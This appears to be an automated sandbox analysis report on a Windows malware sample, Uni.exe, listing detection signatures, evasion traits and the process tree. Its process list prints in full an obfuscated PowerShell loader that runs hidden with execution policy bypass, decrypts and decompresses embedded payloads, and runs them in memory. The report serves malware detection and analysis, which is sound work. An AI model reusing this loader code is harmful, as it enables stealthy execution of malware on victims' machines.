Edit tour
Windows
Analysis Report
Uni.exe
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell decode and execute
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Renames powershell.exe to bypass HIPS
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Executable File Creation
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- Uni.exe (PID: 7432 cmdline:
"C:\Users\ user\Deskt op\Uni.exe " MD5: 917C0479804B76AE493BAD95BF0C7710) - cmd.exe (PID: 7492 cmdline:
cmd /c "Un i.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Uni.bat.exe (PID: 7680 cmdline:
"Uni.bat.e xe" -nopro file -wind owstyle hi dden -ep b ypass -com mand funct ion fVoxT( $oPFNE){ $ iLIer=[Sys tem.Securi ty.Cryptog raphy.Aes] ::Create() ; $iLIer.M ode=[Syste m.Security .Cryptogra phy.Cipher Mode]::CBC ; $iLIer.P adding=[Sy stem.Secur ity.Crypto graphy.Pad dingMode]: :PKCS7; $i LIer.Key=[ System.Con vert]::('g nirtS46esa BmorF'[-1. .-16] -joi n '')('reB Xu8mWH2aPS Y80rUiY+qa l9/pmltEFd 4YzecO07u8 ='); $iLIe r.IV=[Syst em.Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )('SCYRvuo YNjwRzXky6 x630g=='); $APXpI=$i LIer.Creat eDecryptor (); $retur n_var=$APX pI.Transfo rmFinalBlo ck($oPFNE, 0, $oPFNE .Length); $APXpI.Dis pose(); $i LIer.Dispo se(); $ret urn_var;}f unction Wm mYx($oPFNE ){ $toQfi= New-Object System.IO .MemoryStr eam(,$oPFN E); $LIvgb =New-Objec t System.I O.MemorySt ream; $Gly wg=New-Obj ect System .IO.Compre ssion.GZip Stream($to Qfi, [IO.C ompression .Compressi onMode]::D ecompress) ; $Glywg.C opyTo($LIv gb); $Glyw g.Dispose( ); $toQfi. Dispose(); $LIvgb.Di spose(); $ LIvgb.ToAr ray();}fun ction AHAK Z($oPFNE,$ XBFqp){ $T aiwF=[Syst em.Reflect ion.Assemb ly]::('dao L'[-1..-4] -join '') ([byte[]]$ oPFNE); $J ZvRO=$Taiw F.EntryPoi nt; $JZvRO .Invoke($n ull, $XBFq p);}$ZxJef =[System.I O.File]::( 'txeTllAda eR'[-1..-1 1] -join ' ')('C:\Use rs\user~1\ AppData\Lo cal\Temp\I XP000.TMP\ Uni.bat'). Split([Env ironment]: :NewLine); foreach ($ faxqr in $ ZxJef) { i f ($faxqr. StartsWith ('SEROXEN' )) { $MyVZ J=$faxqr.S ubstring(7 ); break; }}$tSYrU=[ string[]]$ MyVZJ.Spli t('\');$Wd ICd=WmmYx (fVoxT ([C onvert]::( 'gnirtS46e saBmorF'[- 1..-16] -j oin '')($t SYrU[0]))) ;$eFigo=Wm mYx (fVoxT ([Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )($tSYrU[1 ])));AHAKZ $eFigo (, [string[]] ('', 'idT znCCsreqaE EjvuwzuTui tglIVMFHEu LsTnnuHsLw yMmxaqK', 'LkIzMJCsa tThEdeYOSS AwnZMOfyqe jPcYtnoxQi uObLPDohIJ N'));AHAKZ $WdICd (, [string[]] ('', 'idT znCCsreqaE EjvuwzuTui tglIVMFHEu LsTnnuHsLw yMmxaqK', 'LkIzMJCsa tThEdeYOSS AwnZMOfyqe jPcYtnoxQi uObLPDohIJ N')); MD5: 04029E121A0CFA5991749937DD22A1D9)
- rundll32.exe (PID: 7796 cmdline:
"C:\Window s\system32 \rundll32. exe" C:\Wi ndows\syst em32\advpa ck.dll,Del NodeRunDLL 32 "C:\Use rs\user~1\ AppData\Lo cal\Temp\I XP000.TMP\ " MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |